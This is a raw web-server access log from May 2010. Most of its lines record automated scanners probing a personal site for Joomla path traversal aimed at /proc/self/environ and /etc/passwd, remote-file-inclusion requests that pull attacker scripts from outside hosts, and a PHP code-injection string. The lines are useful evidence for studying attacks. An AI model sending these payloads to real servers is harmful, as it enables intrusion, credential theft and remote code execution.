66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:33 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:34 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:16:28 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:16:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:16:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:16:30 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
137.101.192.15 - - [15/May/2010:16:18:37 -0500] "GET /logs/download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
137.101.192.15 - - [15/May/2010:16:18:37 -0500] "GET /logs/access_log.1273190400%20%20/download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
137.101.192.15 - - [15/May/2010:16:18:38 -0500] "GET /download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
75.82.68.213 - - [15/May/2010:16:21:26 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.com/search?client=safari&rls=en&q=nations+costumes&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.82.68.213 - - [15/May/2010:16:21:26 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.82.68.213 - - [15/May/2010:16:21:26 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.82.68.213 - - [15/May/2010:16:21:27 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.82.68.213 - - [15/May/2010:16:21:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
75.82.68.213 - - [15/May/2010:16:21:29 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
87.250.255.243 - - [15/May/2010:16:21:57 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.51 - - [15/May/2010:16:23:39 -0500] "GET /logs/access_log.1188604800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [15/May/2010:16:26:03 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:16:26:05 -0500] "GET /logs/ HTTP/1.1" 200 5638 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:16:26:07 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [15/May/2010:16:28:32 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:16:34:27 -0500] "GET /logs/access_log.1171670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.192.168.241 - - [15/May/2010:16:34:27 -0500] "GET /logs/access_log.1273190400//index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.192.168.241 - - [15/May/2010:16:34:28 -0500] "GET //index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.192.168.241 - - [15/May/2010:16:34:28 -0500] "GET /logs//index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
202.125.44.136 - - [15/May/2010:16:34:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.18.127.213 - - [15/May/2010:16:38:21 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:38:21 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:16:38:52 -0500] "GET /logs/access_log.1172534400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.241 - - [15/May/2010:16:40:09 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.168.241 - - [15/May/2010:16:40:11 -0500] "GET /logs/access_log.1271894400//index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
208.43.194.3 - - [15/May/2010:16:41:37 -0500] "GET /logs//visualrecommend.html.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:41:37 -0500] "GET //visualrecommend.html.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:41:37 -0500] "GET /logs/access_log.1266451200//visualrecommend.html.php?mosConfig_absolute_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:16:44:22 -0500] "GET /logs/access_log.1177027200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [15/May/2010:16:45:13 -0500] "GET /bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:45:13 -0500] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:45:13 -0500] "GET /logs/access_log.1265068800/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:45:16 -0500] "GET /logs/access_log.1265068800/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:45:16 -0500] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:45:16 -0500] "GET /bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.252.3.230 - - [15/May/2010:16:45:32 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [15/May/2010:16:45:32 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.125.44.136 - - [15/May/2010:16:46:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
202.125.44.136 - - [15/May/2010:16:46:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.125.44.136 - - [15/May/2010:16:46:08 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
208.43.194.3 - - [15/May/2010:16:46:35 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:46:35 -0500] "GET /logs/access_log.1273017600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:46:35 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:47:31 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:47:31 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
208.43.194.3 - - [15/May/2010:16:47:31 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.252.3.230 - - [15/May/2010:16:47:47 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [15/May/2010:16:47:47 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:47:55 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:47:55 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:47:55 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:00 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:00 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:01 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:30 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:30 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:41 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:41 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:48:42 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:16:50:57 -0500] "GET /logs/access_log.1266278400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.18.127.213 - - [15/May/2010:16:51:46 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.18.127.213 - - [15/May/2010:16:51:55 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
208.43.194.3 - - [15/May/2010:16:54:19 -0500] "GET /logs/access_log.1270857600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://christenplein.com/id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
202.125.44.136 - - [15/May/2010:16:54:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.110.10.185 - - [15/May/2010:16:57:27 -0500] "GET //errors.php?error=http://askdrpet.com/administrator/components/com_virtuemart/Ckrid1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.110.10.185 - - [15/May/2010:16:57:27 -0500] "GET /logs//errors.php?error=http://askdrpet.com/administrator/components/com_virtuemart/Ckrid1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.110.10.185 - - [15/May/2010:16:57:27 -0500] "GET /logs/access_log.1272844800%20%20//errors.php?error=http://askdrpet.com/administrator/components/com_virtuemart/Ckrid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.110.10.185 - - [15/May/2010:16:58:08 -0500] "GET /logs/access_log.1272844800//errors.php?error=http://askdrpet.com/administrator/components/com_virtuemart/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.78.118.123 - - [15/May/2010:16:58:36 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:16:58:37 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:16:58:37 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:16:58:39 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [15/May/2010:16:59:06 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:16:59:50 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:16:59:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:16:59:51 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:00:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:00:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:00:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
173.236.37.218 - - [15/May/2010:17:04:30 -0500] "GET /logs/rfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.810"
173.236.37.218 - - [15/May/2010:17:04:30 -0500] "GET /rfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.810"
174.136.55.175 - - [15/May/2010:17:04:36 -0500] "GET /logs/rfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.823"
174.136.55.175 - - [15/May/2010:17:04:36 -0500] "GET /rfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.823"
211.43.201.70 - - [15/May/2010:17:05:01 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:05:07 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:05:08 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:05:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:05:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:05:12 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:17:05:14 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [15/May/2010:17:05:25 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:06:27 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:06:28 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:06:28 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [15/May/2010:17:06:51 -0500] "GET /logs/access_log.1179705600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.159.31.10 - - [15/May/2010:17:09:06 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.159.31.10 - - [15/May/2010:17:09:06 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
109.123.72.130 - - [15/May/2010:17:09:51 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.38.187.136 - - [15/May/2010:17:10:12 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:12 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:12 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:14 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:14 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:14 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.73.227.210 - - [15/May/2010:17:10:18 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:10:18 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
208.38.187.136 - - [15/May/2010:17:10:36 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:10:41 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:17:11:49 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.38.187.136 - - [15/May/2010:17:12:00 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:12:00 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:12:14 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.38.187.136 - - [15/May/2010:17:12:14 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://come.kr/bbs/data/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.204.238 - - [15/May/2010:17:14:38 -0500] "GET /logs/access_log.1248134400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [15/May/2010:17:15:11 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:15:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:15:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.73.227.210 - - [15/May/2010:17:17:38 -0500] "GET /logs/access_log.1273190400/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:17:39 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:17:39 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:17:45 -0500] "GET /logs/access_log.1273190400/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:17:46 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
217.73.227.210 - - [15/May/2010:17:17:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.807"
87.250.255.243 - - [15/May/2010:17:19:31 -0500] "GET /logs/access_log.1269129600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [15/May/2010:17:19:35 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
